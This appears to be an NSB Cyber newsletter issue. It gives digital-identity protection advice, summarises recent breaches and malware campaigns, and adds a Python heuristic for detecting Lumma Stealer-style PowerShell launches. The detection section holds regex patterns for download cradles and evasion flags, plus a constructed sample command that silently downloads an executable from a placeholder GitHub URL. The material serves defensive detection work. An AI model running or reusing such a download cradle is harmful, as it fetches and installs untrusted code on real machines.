#NSBCS.009 - X Marks the Spot - Protecting your Digital Identity

Source: NSB Cyber

X Marks the Spot - Protecting your Digital Identity

The recent security breaches involving the Securities and Exchange Commission's (SEC) account on the social media platform X (formerly Twitter) and the notable Mandiant X breach underscore the growing challenges in protecting digital identities online. These incidents highlight the methods employed by attackers and the weaknesses that exist even within reputable organisations. In this context it is worth setting out the strategies for safeguarding digital identities, particularly on social media and other online platforms. These include:

1. Strong Passwords and Unique Account Details: Essential for each online account. A unique, complex password for every account means that one compromised password cannot simply be replayed against your other accounts (credential stuffing).

2. Use of a Password Manager: Implementing a password manager is a highly effective strategy for managing and securing your online credentials. A password manager keeps all your passwords in an encrypted vault, enabling you to create and use complex, unique passwords for each account without the need to remember each one.

3. Two-Factor Authentication (2FA): A critical layer of defence, as the SEC incident showed: 2FA was not in place on the account, which facilitated the takeover. 2FA, whether through codes from an authentication app, a hardware security key or, as a weaker fallback, SMS codes sent to a mobile device, significantly reduces the risk of unauthorised access. Where the platform offers it, prefer an authenticator app or security key over SMS, since SMS codes can be intercepted by an attacker who SIM-swaps your phone number.

4. Regular Monitoring and Updates: Keeping a vigilant eye on account activity and hardening security settings beyond the defaults is crucial. Regular reviews of login activity can alert users to unauthorised access attempts, and up-to-date contact information ensures security alerts are received promptly.

5. Education on Phishing and Social Engineering Attacks: Understanding and recognising phishing attempts and social engineering tactics is key. Many breaches occur because users are tricked into handing over their login details, so awareness of and caution towards suspicious emails or messages are essential.

6. Use of Security Tools and Services: Leveraging the security features and tools offered by platforms can enhance security. Features such as login alerts and verification of new devices before they are allowed to sign in are effective measures.

7. Awareness of Platform-specific Security Features: Each platform has its own set of security features and policies. Being informed about the specific settings and recommendations for each platform you use is crucial.

For information on NSB Cyber’s Cyber Resilience capabilities or to book a meeting with our team, click here.


What we read this week

  • Beware Weaponised YouTube Channels Spreading Lumma Stealer - Hackers are spreading malware called Lumma Stealer through YouTube channels. The cybercriminals upload videos about cracking popular software and embed malicious links in the descriptions; clicking a link downloads a ZIP file containing the malware. The ZIP file includes an .LNK shortcut that, when opened, launches PowerShell to download a .NET executable from a GitHub repository. That file then installs Lumma Stealer, which steals user credentials, system details, browser data and even browser extensions.

  • Mortgage firm LoanDepot cyberattack impacts IT systems, payment portal - Mortgage firm LoanDepot has suffered a cyberattack disrupting online payments and internal systems. LoanDepot holds sensitive financial data like bank account details, raising concerns about potential phishing scams or identity theft targeting clients following the attack. Customers are advised to remain vigilant and cautious about any unsolicited communication claiming to be from the company.

  • Hackers breach Australian court hearing database - Cybercriminals have infiltrated the Victorian court system, potentially accessing recordings of court hearings between November 1 and December 21, 2023. While no other court records or employee data were compromised, the exposed hearing recordings raise concerns about sensitive information being leaked. The attack is attributed to Qilin, a notorious ransomware group known for targeting critical infrastructure and demanding hefty ransoms ranging from $50,000 to $800,000. Authorities are actively investigating the breach, and the Victorian government is urging increased vigilance against potential scams or misuse of the exposed hearing recordings.

  • Ivanti warns of Connect Secure zero-days exploited in attacks - Ivanti has disclosed two critical vulnerabilities in its Connect Secure and Policy Secure products, both of which are being actively exploited. The first (CVE-2023-46805) is an authentication bypass in the gateways' web component, meaning an attacker can reach restricted resources without valid login credentials. The second (CVE-2024-21887) is a command injection flaw that lets an authenticated user run arbitrary commands; chained with the authentication bypass, it allows an unauthenticated attacker to take complete control of a vulnerable appliance. Threat intelligence company Volexity believes Chinese state-backed threat actors had been exploiting these vulnerabilities as early as December last year.

  • New Bandook RAT Variant Resurfaces, Targeting Windows Machines - A new variant of the Bandook Remote Access Trojan (RAT) has resurfaced, targeting Windows machines through phishing emails that carry a PDF attachment. The PDF embeds a link to a password-protected 7z archive; once the archive is downloaded and extracted with the password supplied in the PDF, the malware injects its payload into a legitimate Windows process, msinfo32.exe, masking its activity behind a trusted binary. Besides making Windows Registry changes to establish persistence on the compromised host, the malware contacts a command-and-control (C2) server to retrieve additional payloads and instructions.
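
The Lumma Stealer chain above (shortcut opened from a ZIP, PowerShell launched from Explorer, payload pulled from GitHub) is a good candidate for a process-creation detection. The following is an added example written for this newsletter, not a rule from the referenced article or from any vendor: a small heuristic that scores Sysmon-style process-creation events and flags PowerShell launches that combine several of the traits described. The events are constructed for the illustration (the GitHub URL, paths and event IDs are invented), and the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine). It deliberately generalises beyond Lumma: any download cradle from any host is scored, and the threshold decides how noisy the rule is.

```python
from __future__ import annotations

import json
import re

# Traits of the chain described in the article, each scored independently.
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
LNK_LAUNCHER = re.compile(r"\\explorer\.exe$", re.I)          # a double-clicked .LNK is spawned by Explorer
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.I)
GITHUB_HOST = re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I)
EVASION_FLAGS = re.compile(
    r"-(enc|encodedcommand|w hidden|windowstyle hidden|nop|noprofile|ep bypass|executionpolicy bypass)", re.I)


def score_event(ev: dict) -> list[str]:
    """Return the list of suspicious traits seen on one process-creation event."""
    reasons: list[str] = []
    if not POWERSHELL.search(ev.get("Image", "")):
        return reasons
    cmd = ev.get("CommandLine", "")
    if LNK_LAUNCHER.search(ev.get("ParentImage", "")):
        reasons.append("powershell spawned by explorer.exe (shortcut or double-click launch)")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if GITHUB_HOST.search(cmd):
        reasons.append("payload fetched from GitHub")
    if EVASION_FLAGS.search(cmd):
        reasons.append("hidden window / no-profile / encoded command flags")
    return reasons


def triage(lines: list[str], threshold: int = 3) -> list[tuple[int, list[str]]]:
    """Parse JSON event lines and return (EventId, reasons) for events at or above the threshold."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["EventId"], reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},             # routine admin script
    {"EventId": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -c (New-Object Net.WebClient).DownloadFile("
                    r"'https://github.com/example-user/example-repo/raw/main/update.exe',"
                    r"'C:\Users\Public\update.exe')"},                                   # the article's chain
    {"EventId": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r"powershell.exe -Command Invoke-WebRequest "
                    r"https://github.com/example-org/example-tool/releases/download/v1.2/tool.zip "
                    r"-OutFile tool.zip"},                                               # developer fetching a release
    {"EventId": 4, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_LINES):
        print(f"event {event_id}: " + "; ".join(reasons))
```

At the default threshold of 3 only event 2 fires; lowering it to 2 also catches the developer pulling a release from GitHub (event 3), which is the kind of false positive this rule will generate in engineering environments. Tune the threshold per host population, or treat the Explorer-parent trait as mandatory, rather than alerting on the GitHub host alone.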

References
https://www.darkreading.com/cyberattacks-data-breaches/weaponized-youtube-channels-spread-lumma-stealer
https://www.bleepingcomputer.com/news/security/mortgage-firm-loandepot-cyberattack-impacts-it-systems-payment-portal/
https://therecord.media/hackers-breach-australian-court-hearing-database
https://www.bleepingcomputer.com/news/security/ivanti-warns-of-connect-secure-zero-days-exploited-in-attacks/
https://thehackernews.com/2024/01/new-bandook-rat-variant-resurfaces.html